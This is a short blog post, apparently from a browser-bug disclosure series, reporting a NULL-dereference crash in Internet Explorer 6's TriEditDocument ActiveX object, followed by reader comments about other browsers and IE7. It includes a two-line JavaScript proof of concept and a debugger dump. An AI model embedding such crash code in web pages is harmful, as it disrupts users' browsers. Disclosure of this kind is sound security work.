MoBB #12: TriEditDocument URL
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the URL property of this object triggers a NULL dereference.
var a = new ActiveXObject('TriEditDocument.TriEditDocument');
a.URL = "Boom!";
Demonstration
eax=00000000 ebx=00000001 ecx=000076b6
edx=018f486c esi=018f3c10 edi=00000000
eip=7dcd113e esp=00137034 ebp=00139060
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??
This bug will be added to the OSVDB:
Microsoft IE TriEditDocument URL Property NULL Dereference
posted by hdm @ 10:26 PM
5 comments
links to this post
5 Comments:
no problem with opera 9 :D
no prob with this:
Mozilla/5.0 Gecko/20060508 Firefox/1.5.0.4
Opera doesn't support ActiveX by default so unless you have neptune installed your post is pointless.
It *would* be interesting if someone would install neptune (link:
http://www.meadco.com/neptune/ ) or the Mozilla ActiveX control
(link: http://www.iol.ie/~locka/mozilla/control.htm ) and give these bugs a try.
Relevant Neptune information:
Neptune allows the Microsoft WebBrowser Control (link: http://msdn.microsoft.com/workshop/browser/webbrowser/WebBrowser.asp ) to work in Opera, Netscape, and any Gecko based products. Requires win32 platform obviously. "Any Internet Explorer-specific DHTML content and/or ActiveX control will work in Neptune, limited only by the version of the underlying WebBrowser control."
Mozilla ActiveX information:
The following interfaces have been implemented satisfactorily:
* IWebBrowser (basic web browsing functions for navigation and son on)
* IWebBrowserApp (some extended functions for IE, the application)
* IWebBrowser2 (some more functions for IE, the application)
* DWebBrowserEvents (basic navigation events)
* DWebBrowserEvents2 (more events, mainly for the IE app)
I will scream into the void of the Internet if one more person tries to defend IE by saying "not a security issue because a pop-up window warns the user" or "user must click on the gold bar at the top so not a problem."
It has been shown recently (and come on, our common sense says this) that users just click "Ok" and accept most of these things that pop up so that they can continue with the content. A mistake in coding is a mistake in coding...
-LV
IE7 is not vulnerable. First the user must allow the code to run from the information bar. Then, the popup is blocked without IE7 crashing.
Latest patched IE6 crashes.
Post a Comment
Links to this post:
Create a Link
<< Home